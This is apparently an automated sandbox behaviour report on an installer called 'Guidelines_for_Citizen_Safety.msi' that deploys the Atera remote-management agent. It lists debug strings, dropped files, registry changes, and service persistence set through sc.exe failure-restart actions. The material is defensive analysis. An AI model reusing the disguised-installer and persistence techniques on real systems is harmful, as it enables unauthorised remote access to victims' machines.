                              Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\System.pdbpdbtem.pdbh. source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.15.dr
                              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: rundll32.exe, 00000005.00000002.1452340287.0000000007477000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe.2.dr
                              Source: Binary string: \??\C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1450208878.0000000002F24000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.15.dr, Newtonsoft.Json.dll.18.dr
                              Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000013.00000002.1777176033.000002AC50642000.00000002.00000001.01000000.0000001A.sdmp, Atera.AgentPackage.Common.dll.15.dr
                              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: System.ValueTuple.dll.2.dr
                              Source: Binary string: n\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1449544023.0000000002947000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1599311531.00000000004E7000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Guidelines_for_Citizen_Safety.msi, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, 6c6861.msi.2.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.dr
                              Source: Binary string: dows\dll\System.pdb source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdbw source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr
                              Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000013.00000002.1777176033.000002AC50642000.00000002.00000001.01000000.0000001A.sdmp, Atera.AgentPackage.Common.dll.15.dr
                              Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdbg, source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.PDBI source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr
                              Source: Binary string: \??\C:\Windows\System.pdbI source: rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ?*nC:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdbc source: rundll32.exe, 00000012.00000002.1599311531.00000000004E7000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe.2.dr
                              Source: Binary string: \??\C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.PDB source: rundll32.exe, 00000005.00000002.1450208878.0000000002F24000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: System.ValueTuple.dll.2.dr
                              Source: Binary string: \??\C:\Windows\System.pdbC source: rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.1536773813.00000158EEE32000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll.2.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000D.00000002.1536773813.00000158EEE32000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll.2.dr
                              Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb` source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdble source: rundll32.exe, 00000012.00000002.1599979903.0000000002E3D000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ?*nC:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1449544023.0000000002947000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Guidelines_for_Citizen_Safety.msi, MSI7013.tmp.2.dr, 6c6863.msi.2.dr, MSIA9F5.tmp.2.dr, MSI87B3.tmp.2.dr, MSI6A36.tmp.2.dr, 6c6861.msi.2.dr
                              Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbo source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbx5 source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.dr
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbg source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbsec source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdby source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: BouncyCastle.Crypto.dll.2.drStatic PE information: 0xE49A52B3 [Sun Jul 15 06:22:43 2091 UTC]
                              Source: MSIA9F5.tmp.2.drStatic PE information: real checksum: 0x32353 should be: 0x88610
                              Source: MSI87B3.tmp.2.drStatic PE information: real checksum: 0x32353 should be: 0x88610
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_06F184A1 push es; ret 5_3_06F184B0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB487C29 push eax; retf 15_2_00007FFAAB487C6D
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB480AD8 pushad ; ret 15_2_00007FFAAB480AE1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB4878F3 push ebx; retf 15_2_00007FFAAB48796A
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB670F68 push eax; ret 15_2_00007FFAAB670F94
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_3_06B58420 push es; ret 18_3_06B584B0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB4400BD pushad ; iretd 19_2_00007FFAAB4400C1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB4600BD pushad ; iretd 23_2_00007FFAAB4600C1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB475587 push ebp; iretd 23_2_00007FFAAB4755D8
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB4700BD pushad ; iretd 25_2_00007FFAAB4700C1

                              Persistence and Installation Behavior

                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8A93.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI87B3.tmpJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA9F5.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A36.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8C79.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8B30.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7013.tmpJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLogJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLogJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOGPFAULTERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
